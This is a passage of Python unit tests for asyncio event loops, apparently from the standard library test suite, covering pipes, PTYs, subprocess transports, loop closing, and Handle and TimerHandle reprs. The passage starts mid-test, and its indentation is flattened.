infos = self.loop.run_until_complete(
self.loop.getaddrinfo(
*local_address, type=socket.SOCK_DGRAM))
for family, type, proto, cname, address in infos:
try:
sock = socket.socket(family=family, type=type, proto=proto)
sock.setblocking(False)
sock.bind(address)
except:
pass
else:
break
else:
assert False, 'Can not create socket.'
f = self.loop.create_connection(
lambda: MyDatagramProto(loop=self.loop), sock=sock)
tr, pr = self.loop.run_until_complete(f)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, MyDatagramProto)
tr.close()
self.loop.run_until_complete(pr.done)
def test_internal_fds(self):
loop = self.create_event_loop()
if not isinstance(loop, selector_events.BaseSelectorEventLoop):
loop.close()
self.skipTest('loop is not a BaseSelectorEventLoop')
self.assertEqual(1, loop._internal_fds)
loop.close()
self.assertEqual(0, loop._internal_fds)
self.assertIsNone(loop._csock)
self.assertIsNone(loop._ssock)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_read_pipe(self):
proto = MyReadPipeProto(loop=self.loop)
rpipe, wpipe = os.pipe()
pipeobj = io.open(rpipe, 'rb', 1024)
@asyncio.coroutine
def connect():
t, p = yield from self.loop.connect_read_pipe(
lambda: proto, pipeobj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(0, proto.nbytes)
self.loop.run_until_complete(connect())
os.write(wpipe, b'1')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 1)
self.assertEqual(1, proto.nbytes)
os.write(wpipe, b'2345')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(5, proto.nbytes)
os.close(wpipe)
self.loop.run_until_complete(proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_unclosed_pipe_transport(self):
# This test reproduces the issue #314 on GitHub
loop = self.create_event_loop()
read_proto = MyReadPipeProto(loop=loop)
write_proto = MyWritePipeProto(loop=loop)
rpipe, wpipe = os.pipe()
rpipeobj = io.open(rpipe, 'rb', 1024)
wpipeobj = io.open(wpipe, 'w', 1024)
@asyncio.coroutine
def connect():
read_transport, _ = yield from loop.connect_read_pipe(
lambda: read_proto, rpipeobj)
write_transport, _ = yield from loop.connect_write_pipe(
lambda: write_proto, wpipeobj)
return read_transport, write_transport
# Run and close the loop without closing the transports
read_transport, write_transport = loop.run_until_complete(connect())
loop.close()
# These 'repr' calls used to raise an AttributeError
# See Issue #314 on GitHub
self.assertIn('open', repr(read_transport))
self.assertIn('open', repr(write_transport))
# Clean up (avoid ResourceWarning)
rpipeobj.close()
wpipeobj.close()
read_transport._pipe = None
write_transport._pipe = None
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
# Issue #20495: The test hangs on FreeBSD 7.2 but pass on FreeBSD 9
@support.requires_freebsd_version(8)
def test_read_pty_output(self):
proto = MyReadPipeProto(loop=self.loop)
master, slave = os.openpty()
master_read_obj = io.open(master, 'rb', 0)
@asyncio.coroutine
def connect():
t, p = yield from self.loop.connect_read_pipe(lambda: proto,
master_read_obj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(0, proto.nbytes)
self.loop.run_until_complete(connect())
os.write(slave, b'1')
test_utils.run_until(self.loop, lambda: proto.nbytes)
self.assertEqual(1, proto.nbytes)
os.write(slave, b'2345')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(5, proto.nbytes)
os.close(slave)
self.loop.run_until_complete(proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe(self):
rpipe, wpipe = os.pipe()
pipeobj = io.open(wpipe, 'wb', 1024)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = bytearray()
def reader(data):
chunk = os.read(rpipe, 1024)
data += chunk
return len(data)
test_utils.run_until(self.loop, lambda: reader(data) >= 1)
self.assertEqual(b'1', data)
transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5)
self.assertEqual(b'12345', data)
self.assertEqual('CONNECTED', proto.state)
os.close(rpipe)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe_disconnect_on_close(self):
rsock, wsock = test_utils.socketpair()
rsock.setblocking(False)
pipeobj = io.open(wsock.detach(), 'wb', 1024)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = self.loop.run_until_complete(self.loop.sock_recv(rsock, 1024))
self.assertEqual(b'1', data)
rsock.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
def test_write_pty(self):
master, slave = os.openpty()
slave_write_obj = io.open(slave, 'wb', 0)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, slave_write_obj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = bytearray()
def reader(data):
chunk = os.read(master, 1024)
data += chunk
return len(data)
test_utils.run_until(self.loop, lambda: reader(data) >= 1,
timeout=10)
self.assertEqual(b'1', data)
transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5,
timeout=10)
self.assertEqual(b'12345', data)
self.assertEqual('CONNECTED', proto.state)
os.close(master)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
def test_bidirectional_pty(self):
master, read_slave = os.openpty()
write_slave = os.dup(read_slave)
tty.setraw(read_slave)
slave_read_obj = io.open(read_slave, 'rb', 0)
read_proto = MyReadPipeProto(loop=self.loop)
read_connect = self.loop.connect_read_pipe(lambda: read_proto,
slave_read_obj)
read_transport, p = self.loop.run_until_complete(read_connect)
self.assertIs(p, read_proto)
self.assertIs(read_transport, read_proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(0, read_proto.nbytes)
slave_write_obj = io.open(write_slave, 'wb', 0)
write_proto = MyWritePipeProto(loop=self.loop)
write_connect = self.loop.connect_write_pipe(lambda: write_proto,
slave_write_obj)
write_transport, p = self.loop.run_until_complete(write_connect)
self.assertIs(p, write_proto)
self.assertIs(write_transport, write_proto.transport)
self.assertEqual('CONNECTED', write_proto.state)
data = bytearray()
def reader(data):
chunk = os.read(master, 1024)
data += chunk
return len(data)
write_transport.write(b'1')
test_utils.run_until(self.loop, lambda: reader(data) >= 1, timeout=10)
self.assertEqual(b'1', data)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual('CONNECTED', write_proto.state)
os.write(master, b'a')
test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 1,
timeout=10)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(1, read_proto.nbytes)
self.assertEqual('CONNECTED', write_proto.state)
write_transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5, timeout=10)
self.assertEqual(b'12345', data)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual('CONNECTED', write_proto.state)
os.write(master, b'bcde')
test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 5,
timeout=10)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(5, read_proto.nbytes)
self.assertEqual('CONNECTED', write_proto.state)
os.close(master)
read_transport.close()
self.loop.run_until_complete(read_proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], read_proto.state)
write_transport.close()
self.loop.run_until_complete(write_proto.done)
self.assertEqual('CLOSED', write_proto.state)
def test_prompt_cancellation(self):
r, w = test_utils.socketpair()
r.setblocking(False)
f = self.loop.sock_recv(r, 1)
ov = getattr(f, 'ov', None)
if ov is not None:
self.assertTrue(ov.pending)
@asyncio.coroutine
def main():
try:
self.loop.call_soon(f.cancel)
yield from f
except asyncio.CancelledError:
res = 'cancelled'
else:
res = None
finally:
self.loop.stop()
return res
start = time.monotonic()
t = asyncio.Task(main(), loop=self.loop)
self.loop.run_forever()
elapsed = time.monotonic() - start
self.assertLess(elapsed, 0.1)
self.assertEqual(t.result(), 'cancelled')
self.assertRaises(asyncio.CancelledError, f.result)
if ov is not None:
self.assertFalse(ov.pending)
self.loop._stop_serving(r)
r.close()
w.close()
def test_timeout_rounding(self):
def _run_once():
self.loop._run_once_counter += 1
orig_run_once()
orig_run_once = self.loop._run_once
self.loop._run_once_counter = 0
self.loop._run_once = _run_once
@asyncio.coroutine
def wait():
loop = self.loop
yield from asyncio.sleep(1e-2, loop=loop)
yield from asyncio.sleep(1e-4, loop=loop)
yield from asyncio.sleep(1e-6, loop=loop)
yield from asyncio.sleep(1e-8, loop=loop)
yield from asyncio.sleep(1e-10, loop=loop)
self.loop.run_until_complete(wait())
# The ideal number of call is 12, but on some platforms, the selector
# may sleep at little bit less than timeout depending on the resolution
# of the clock used by the kernel. Tolerate a few useless calls on
# these platforms.
self.assertLessEqual(self.loop._run_once_counter, 20,
{'clock_resolution': self.loop._clock_resolution,
'selector': self.loop._selector.__class__.__name__})
def test_remove_fds_after_closing(self):
loop = self.create_event_loop()
callback = lambda: None
r, w = test_utils.socketpair()
self.addCleanup(r.close)
self.addCleanup(w.close)
loop.add_reader(r, callback)
loop.add_writer(w, callback)
loop.close()
self.assertFalse(loop.remove_reader(r))
self.assertFalse(loop.remove_writer(w))
def test_add_fds_after_closing(self):
loop = self.create_event_loop()
callback = lambda: None
r, w = test_utils.socketpair()
self.addCleanup(r.close)
self.addCleanup(w.close)
loop.close()
with self.assertRaises(RuntimeError):
loop.add_reader(r, callback)
with self.assertRaises(RuntimeError):
loop.add_writer(w, callback)
def test_close_running_event_loop(self):
@asyncio.coroutine
def close_loop(loop):
self.loop.close()
coro = close_loop(self.loop)
with self.assertRaises(RuntimeError):
self.loop.run_until_complete(coro)
def test_close(self):
self.loop.close()
@asyncio.coroutine
def test():
pass
func = lambda: False
coro = test()
self.addCleanup(coro.close)
# operation blocked when the loop is closed
with self.assertRaises(RuntimeError):
self.loop.run_forever()
with self.assertRaises(RuntimeError):
fut = asyncio.Future(loop=self.loop)
self.loop.run_until_complete(fut)
with self.assertRaises(RuntimeError):
self.loop.call_soon(func)
with self.assertRaises(RuntimeError):
self.loop.call_soon_threadsafe(func)
with self.assertRaises(RuntimeError):
self.loop.call_later(1.0, func)
with self.assertRaises(RuntimeError):
self.loop.call_at(self.loop.time() + .0, func)
with self.assertRaises(RuntimeError):
self.loop.run_in_executor(None, func)
with self.assertRaises(RuntimeError):
self.loop.create_task(coro)
with self.assertRaises(RuntimeError):
self.loop.add_signal_handler(signal.SIGTERM, func)
class SubprocessTestsMixin:
def check_terminated(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGTERM, returncode)
def check_killed(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGKILL, returncode)
def test_subprocess_exec(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
self.assertEqual(b'Python The Winner', proto.data[1])
def test_subprocess_interactive(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python ')
self.loop.run_until_complete(proto.got_data[1].wait())
proto.got_data[1].clear()
self.assertEqual(b'Python ', proto.data[1])
stdin.write(b'The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'Python The Winner', proto.data[1])
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
def test_subprocess_shell(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'echo Python')
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.get_pipe_transport(0).close()
self.loop.run_until_complete(proto.completed)
self.assertEqual(0, proto.returncode)
self.assertTrue(all(f.done() for f in proto.disconnects.values()))
self.assertEqual(proto.data[1].rstrip(b'\r\n'), b'Python')
self.assertEqual(proto.data[2], b'')
transp.close()
def test_subprocess_exitcode(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
transp.close()
def test_subprocess_close_after_finish(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.assertIsNone(transp.get_pipe_transport(0))
self.assertIsNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
self.assertIsNone(transp.close())
def test_subprocess_kill(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.kill()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
transp.close()
def test_subprocess_terminate(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.terminate()
self.loop.run_until_complete(proto.completed)
self.check_terminated(proto.returncode)
transp.close()
@unittest.skipIf(sys.platform == 'win32', "Don't have SIGHUP")
def test_subprocess_send_signal(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.send_signal(signal.SIGHUP)
self.loop.run_until_complete(proto.completed)
self.assertEqual(-signal.SIGHUP, proto.returncode)
transp.close()
def test_subprocess_stderr(self):
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
transp.close()
self.assertEqual(b'OUT:test', proto.data[1])
self.assertTrue(proto.data[2].startswith(b'ERR:test'), proto.data[2])
self.assertEqual(0, proto.returncode)
def test_subprocess_stderr_redirect_to_stdout(self):
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog, stderr=subprocess.STDOUT)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
self.assertIsNotNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
self.assertTrue(proto.data[1].startswith(b'OUT:testERR:test'),
proto.data[1])
self.assertEqual(b'', proto.data[2])
transp.close()
self.assertEqual(0, proto.returncode)
def test_subprocess_close_client_stream(self):
prog = os.path.join(os.path.dirname(__file__), 'echo3.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdout = transp.get_pipe_transport(1)
stdin.write(b'test')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'OUT:test', proto.data[1])
stdout.close()
self.loop.run_until_complete(proto.disconnects[1])
stdin.write(b'xxx')
self.loop.run_until_complete(proto.got_data[2].wait())
if sys.platform != 'win32':
self.assertEqual(b'ERR:BrokenPipeError', proto.data[2])
else:
# After closing the read-end of a pipe, writing to the
# write-end using os.write() fails with errno==EINVAL and
# GetLastError()==ERROR_INVALID_NAME on Windows!?! (Using
# WriteFile() we get ERROR_BROKEN_PIPE as expected.)
self.assertEqual(b'ERR:OSError', proto.data[2])
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
def test_subprocess_wait_no_same_group(self):
# start the new process in a new session
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None,
start_new_session=True)
_, proto = yield self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
def test_subprocess_exec_invalid_args(self):
@asyncio.coroutine
def connect(**kwds):
yield from self.loop.subprocess_exec(
asyncio.SubprocessProtocol,
'pwd', **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=True))
def test_subprocess_shell_invalid_args(self):
@asyncio.coroutine
def connect(cmd=None, **kwds):
if not cmd:
cmd = 'pwd'
yield from self.loop.subprocess_shell(
asyncio.SubprocessProtocol,
cmd, **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(['ls', '-l']))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=False))
if sys.platform == 'win32':
class SelectEventLoopTests(EventLoopTestsMixin, test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop()
class ProactorEventLoopTests(EventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.ProactorEventLoop()
if not sslproto._is_sslproto_available():
def test_create_ssl_connection(self):
raise unittest.SkipTest("need python 3.5 (ssl.MemoryBIO)")
def test_create_server_ssl(self):
raise unittest.SkipTest("need python 3.5 (ssl.MemoryBIO)")
def test_create_server_ssl_verify_failed(self):
raise unittest.SkipTest("need python 3.5 (ssl.MemoryBIO)")
def test_create_server_ssl_match_failed(self):
raise unittest.SkipTest("need python 3.5 (ssl.MemoryBIO)")
def test_create_server_ssl_verified(self):
raise unittest.SkipTest("need python 3.5 (ssl.MemoryBIO)")
def test_legacy_create_ssl_connection(self):
raise unittest.SkipTest("IocpEventLoop incompatible with legacy SSL")
def test_legacy_create_server_ssl(self):
raise unittest.SkipTest("IocpEventLoop incompatible with legacy SSL")
def test_legacy_create_server_ssl_verify_failed(self):
raise unittest.SkipTest("IocpEventLoop incompatible with legacy SSL")
def test_legacy_create_server_ssl_match_failed(self):
raise unittest.SkipTest("IocpEventLoop incompatible with legacy SSL")
def test_legacy_create_server_ssl_verified(self):
raise unittest.SkipTest("IocpEventLoop incompatible with legacy SSL")
def test_reader_callback(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
def test_reader_callback_cancel(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
def test_writer_callback(self):
raise unittest.SkipTest("IocpEventLoop does not have add_writer()")
def test_writer_callback_cancel(self):
raise unittest.SkipTest("IocpEventLoop does not have add_writer()")
def test_create_datagram_endpoint(self):
raise unittest.SkipTest(
"IocpEventLoop does not have create_datagram_endpoint()")
def test_remove_fds_after_closing(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
else:
from asyncio import selectors
class UnixEventLoopTestsMixin(EventLoopTestsMixin):
def setUp(self):
super().setUp()
watcher = asyncio.SafeChildWatcher()
watcher.attach_loop(self.loop)
asyncio.set_child_watcher(watcher)
def tearDown(self):
asyncio.set_child_watcher(None)
super().tearDown()
if hasattr(selectors, 'KqueueSelector'):
class KqueueEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(
selectors.KqueueSelector())
# kqueue doesn't support character devices (PTY) on Mac OS X older
# than 10.9 (Maverick)
@support.requires_mac_ver(10, 9)
# Issue #20667: KqueueEventLoopTests.test_read_pty_output()
# hangs on OpenBSD 5.5
@unittest.skipIf(sys.platform.startswith('openbsd'),
'test hangs on OpenBSD')
def test_read_pty_output(self):
super().test_read_pty_output()
# kqueue doesn't support character devices (PTY) on Mac OS X older
# than 10.9 (Maverick)
@support.requires_mac_ver(10, 9)
def test_write_pty(self):
super().test_write_pty()
if hasattr(selectors, 'EpollSelector'):
class EPollEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.EpollSelector())
if hasattr(selectors, 'PollSelector'):
class PollEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.PollSelector())
# Should always exist.
class SelectEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.SelectSelector())
def noop(*args, **kwargs):
pass
class HandleTests(test_utils.TestCase):
def setUp(self):
self.loop = mock.Mock()
self.loop.get_debug.return_value = True
def test_handle(self):
def callback(*args):
return args
args = ()
h = asyncio.Handle(callback, args, self.loop)
self.assertIs(h._callback, callback)
self.assertIs(h._args, args)
self.assertFalse(h._cancelled)
h.cancel()
self.assertTrue(h._cancelled)
def test_handle_from_handle(self):
def callback(*args):
return args
h1 = asyncio.Handle(callback, (), loop=self.loop)
self.assertRaises(
AssertionError, asyncio.Handle, h1, (), self.loop)
def test_callback_with_exception(self):
def callback():
raise ValueError()
self.loop = mock.Mock()
self.loop.call_exception_handler = mock.Mock()
h = asyncio.Handle(callback, (), self.loop)
h._run()
self.loop.call_exception_handler.assert_called_with({
'message': test_utils.MockPattern('Exception in callback.*'),
'exception': mock.ANY,
'handle': h,
'source_traceback': h._source_traceback,
})
def test_handle_weakref(self):
wd = weakref.WeakValueDictionary()
h = asyncio.Handle(lambda: None, (), self.loop)
wd['h'] = h # Would fail without __weakref__ slot.
def test_handle_repr(self):
self.loop.get_debug.return_value = False
# simple function
h = asyncio.Handle(noop, (1, 2), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<Handle noop(1, 2) at %s:%s>'
% (filename, lineno))
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<Handle cancelled>')
# decorated function
cb = asyncio.coroutine(noop)
h = asyncio.Handle(cb, (), self.loop)
self.assertEqual(repr(h),
'<Handle noop() at %s:%s>'
% (filename, lineno))
# partial function
cb = functools.partial(noop, 1, 2)
h = asyncio.Handle(cb, (3,), self.loop)
regex = (r'^<Handle noop\(1, 2\)\(3\) at %s:%s>$'
% (re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
# partial function with keyword args
cb = functools.partial(noop, x=1)
h = asyncio.Handle(cb, (2, 3), self.loop)
regex = (r'^<Handle noop\(x=1\)\(2, 3\) at %s:%s>$'
% (re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
# partial method
if sys.version_info >= (3, 4):
method = HandleTests.test_handle_repr
cb = functools.partialmethod(method)
filename, lineno = test_utils.get_function_source(method)
h = asyncio.Handle(cb, (), self.loop)
cb_regex = r'<function HandleTests.test_handle_repr .*>'
cb_regex = (r'functools.partialmethod\(%s, , \)\(\)' % cb_regex)
regex = (r'^<Handle %s at %s:%s>$'
% (cb_regex, re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
def test_handle_repr_debug(self):
self.loop.get_debug.return_value = True
# simple function
create_filename = __file__
create_lineno = sys._getframe().f_lineno + 1
h = asyncio.Handle(noop, (1, 2), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<Handle noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# cancelled handle
h.cancel()
self.assertEqual(
repr(h),
'<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# double cancellation won't overwrite _repr
h.cancel()
self.assertEqual(
repr(h),
'<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
def test_handle_source_traceback(self):
loop = asyncio.get_event_loop_policy().new_event_loop()
loop.set_debug(True)
self.set_event_loop(loop)
def check_source_traceback(h):
lineno = sys._getframe(1).f_lineno - 1
self.assertIsInstance(h._source_traceback, list)
self.assertEqual(h._source_traceback[-1][:3],
(__file__,
lineno,
'test_handle_source_traceback'))
# call_soon
h = loop.call_soon(noop)
check_source_traceback(h)
# call_soon_threadsafe
h = loop.call_soon_threadsafe(noop)
check_source_traceback(h)
# call_later
h = loop.call_later(0, noop)
check_source_traceback(h)
# call_at
h = loop.call_later(0, noop)
check_source_traceback(h)
class TimerTests(unittest.TestCase):
def setUp(self):
self.loop = mock.Mock()
def test_hash(self):
when = time.monotonic()
h = asyncio.TimerHandle(when, lambda: False, (),
mock.Mock())
self.assertEqual(hash(h), hash(when))
def test_timer(self):
def callback(*args):
return args
args = (1, 2, 3)
when = time.monotonic()
h = asyncio.TimerHandle(when, callback, args, mock.Mock())
self.assertIs(h._callback, callback)
self.assertIs(h._args, args)
self.assertFalse(h._cancelled)
# cancel
h.cancel()
self.assertTrue(h._cancelled)
self.assertIsNone(h._callback)
self.assertIsNone(h._args)
# when cannot be None
self.assertRaises(AssertionError,
asyncio.TimerHandle, None, callback, args,
self.loop)
def test_timer_repr(self):
self.loop.get_debug.return_value = False
# simple function
h = asyncio.TimerHandle(123, noop, (), self.loop)
src = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<TimerHandle when=123 noop() at %s:%s>' % src)
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<TimerHandle cancelled when=123>')
def test_timer_repr_debug(self):
self.loop.get_debug.return_value = True
# simple function
create_filename = __file__
create_lineno = sys._getframe().f_lineno + 1
h = asyncio.TimerHandle(123, noop, (), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<TimerHandle when=123 noop() '
'at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<TimerHandle cancelled when=123 noop() '
'at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
def test_timer_comparison(self):
def callback(*args):
return args
when = time.monotonic()
h1 = asyncio.TimerHandle(when, callback, (), self.loop)
h2 = asyncio.TimerHandle(when, callback, (), self.loop)
# TODO: Use assertLess etc.
self.assertFalse(h1 < h2)
self.assertFalse(h2 < h1)
